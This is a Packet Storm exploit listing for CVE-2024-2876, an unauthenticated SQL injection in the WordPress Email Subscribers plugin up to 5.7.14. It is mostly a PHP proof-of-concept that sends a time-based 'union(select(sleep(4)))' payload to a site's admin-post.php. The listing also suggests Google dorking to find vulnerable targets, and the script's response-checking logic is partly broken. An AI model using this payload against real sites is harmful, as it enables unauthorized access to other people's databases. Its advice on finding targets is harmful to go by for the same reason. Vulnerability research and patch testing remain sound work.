📄 WordPress Email Subscribers 5.7.14 SQL Injection

🗓️ 02 Mar 2026 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 116 Views

WordPress Email Subscribers plugin vulnerable to SQL injection CVE 2024 2876.

Reporter	Title	Published	Views	Family All 22
GithubExploit	Exploit for CVE-2024-2876	14 Sep 202416:08	–	githubexploit
GithubExploit	Exploit for CVE-2024-2876	9 Oct 202419:24	–	githubexploit
GithubExploit	Exploit for CVE-2024-2876	9 Oct 202419:24	–	githubexploit
Circl	CVE-2024-2876	25 Apr 202406:28	–	circl
CNNVD	WordPress Plugin email-subscribers SQL注入漏洞	2 May 202400:00	–	cnnvd
CVE	CVE-2024-2876	2 May 202416:52	–	cve
Cvelist	CVE-2024-2876 Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin <= 5.7.14 - Unauthenticated SQL Injection	2 May 202416:52	–	cvelist
Nuclei	Wordpress Email Subscribers by Icegram Express - SQL Injection	16 Jun 202607:13	–	nuclei
NVD	CVE-2024-2876	2 May 202417:15	–	nvd
Packet Storm News	WordPress Email Subscribers by Icegram Express 5.7.14 SQL Injection	21 Jan 202500:00	–	packetstormnews

=============================================================================================================================================
    | # Title     : wordpress Email Subscribers 5.7.14 Sql Injection vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/email-subscribers/                                                                            |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The Email Subscribers – Email Marketing, Newsletters, Automation for WordPress and WooCommerce plugin for WordPress is vulnerable to SQL Injection
    
        (Related : https://packetstorm.news/files/id/188767/ Related CVE numbers:	CVE-2024-2876 ) .
    	
    [+] Payload : 
    
    [+] Set Target : line 52.
    
    [+] Usage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    // CVE-2024-2876: SQL Injection Wordpress
    // Author: indoushka
    
    
    // Function to perform the SQL Injection test using cURL
    function test_sql_injection($hostname) {
        $url = "http://{$hostname}/wp-admin/admin-post.php";
        $postFields = "page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111";
        
        $headers = [
            "Host: {$hostname}",
            "Content-Type: application/x-www-form-urlencoded",
        ];
        
        // Initialize cURL session
        $ch = curl_init();
        
        // Set cURL options
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout set to 20 seconds
        
        // Execute cURL and get the response
        $response = curl_exec($ch);
        
        // Check if cURL request was successful
        if(curl_errno($ch)) {
            echo "cURL Error: " . curl_error($ch);
        } else {
            // Check for response characteristics (DSL conditions)
            $duration = substr($response, strpos($response, "duration") + 9, 4); // Adjust as needed based on response structure
            $status_code = substr($response, strpos($response, "status_code") + 12, 3); // Adjust as needed
            $header = substr($response, strpos($response, "header") + 7, 100); // Adjust based on actual response
            
            // Conditions matching (duration, status_code, header content)
            if ($duration >= 4 && $status_code == 200 && strpos($header, "application/json") !== false) {
                echo "SQL Injection vulnerability found!\n";
            } else {
                echo "No vulnerability detected.\n";
            }
        }
        
        // Close cURL session
        curl_close($ch);
    }
    
    // Example usage (Replace {{Hostname}} with the target hostname)
    $hostname = 'example.com';  // Change this to your target
    test_sql_injection($hostname);
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

02 Mar 2026 00:00Current

6Medium risk

Vulners AI Score6

CVSS 3.19.8

EPSS0.80596

SSVC